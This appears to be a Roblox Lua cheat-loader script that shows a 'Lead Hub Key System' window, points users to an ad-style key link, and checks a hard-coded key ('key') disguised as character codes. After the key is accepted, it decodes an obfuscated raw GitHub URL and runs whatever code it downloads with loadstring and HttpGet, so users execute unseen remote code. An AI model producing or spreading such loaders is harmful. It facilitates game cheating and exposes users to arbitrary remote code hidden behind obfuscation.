local a = game:GetService("Players").LocalPlayer
local b = a:WaitForChild("PlayerGui")

local function obfStr(t)
    local s = ""
    for _, v in ipairs(t) do
        s = s .. string.char(v)
    end
    return s
end

local _key = obfStr({107,101,121}) -- "key"
local verified = false

local g = Instance.new("ScreenGui")
g.Name = "Gui_"..math.random(100000,999999)
g.ResetOnSpawn = false
g.Enabled = true
g.Parent = b

local f = Instance.new("Frame")
f.Size = UDim2.new(0, 300, 0, 160)
f.Position = UDim2.new(0.5, -150, 0.5, -80)
f.BackgroundColor3 = Color3.fromRGB(30,30,30)
f.BorderSizePixel = 0
f.AnchorPoint = Vector2.new(0.5, 0.5)
f.Parent = g

local t = Instance.new("TextLabel")
t.Text = "🔐 Lead Hub Key System"
t.Size = UDim2.new(1, 0, 0, 30)
t.BackgroundTransparency = 1
t.Font = Enum.Font.SourceSansBold
t.TextSize = 22
t.TextColor3 = Color3.fromRGB(255,255,255)
t.Parent = f

local c = Instance.new("TextButton")
c.Text = "📋 Copy Key Link"
c.Size = UDim2.new(1, -20, 0, 25)
c.Position = UDim2.new(0, 10, 0, 5)
c.BackgroundColor3 = Color3.fromRGB(100,100,100)
c.TextColor3 = Color3.fromRGB(255,255,255)
c.Font = Enum.Font.SourceSansBold
c.TextSize = 14
c.Parent = f

c.MouseButton1Click:Connect(function()
    local x = obfStr({
        104,116,116,112,115,58,47,47,
        108,105,110,107,45,116,97,114,
        103,101,116,46,110,101,116,47,
        49,51,55,51,56,53,56,47,53,117,
        82,48,72,83,78,122,107,73,86,117
    })
    if setclipboard then setclipboard(x) end
end)

local i = Instance.new("TextLabel")
i.Text = "Get key here:\n" .. "https://link-target.net/1373858/5uR0HSNzkIVu"
i.Size = UDim2.new(1, -10, 0, 50)
i.Position = UDim2.new(0, 5, 0, 35)
i.BackgroundTransparency = 1
i.Font = Enum.Font.SourceSans
i.TextSize = 16
i.TextWrapped = true
i.TextColor3 = Color3.fromRGB(200,200,200)
i.Parent = f

local box = Instance.new("TextBox")
box.PlaceholderText = "Enter key here..."
box.Size = UDim2.new(1, -20, 0, 30)
box.Position = UDim2.new(0, 10, 0, 90)
box.BackgroundColor3 = Color3.fromRGB(45,45,45)
box.TextColor3 = Color3.fromRGB(255,255,255)
box.Font = Enum.Font.SourceSans
box.TextSize = 18
box.Parent = f

local s = Instance.new("TextButton")
s.Text = "Submit"
s.Size = UDim2.new(1, -20, 0, 30)
s.Position = UDim2.new(0, 10, 0, 125)
s.BackgroundColor3 = Color3.fromRGB(50,150,50)
s.TextColor3 = Color3.fromRGB(255,255,255)
s.Font = Enum.Font.SourceSansBold
s.TextSize = 18
s.Parent = f

s.MouseButton1Click:Connect(function()
    if box.Text == _key then
        verified = true
        g:Destroy()
        local rawURL = obfStr({
            104,116,116,112,115,58,47,47,
            114,97,119,46,103,105,116,104,
            117,98,117,115,101,114,99,111,
            110,116,101,110,116,46,99,111,
            109,47,82,101,100,102,105,114,
            101,70,99,47,67,111,110,116,101,
            110,116,45,108,111,108,47,114,
            101,102,115,47,104,101,97,100,
            115,47,109,97,105,110,47,114,
            101,97,100,32,104,117,98,46,
            116,120,116
        })
        loadstring(game:HttpGet(rawURL))()
    else
        s.Text = "❌ Wrong Key!"
        wait(1)
        s.Text = "Submit"
    end
end)

repeat task.wait() until verified
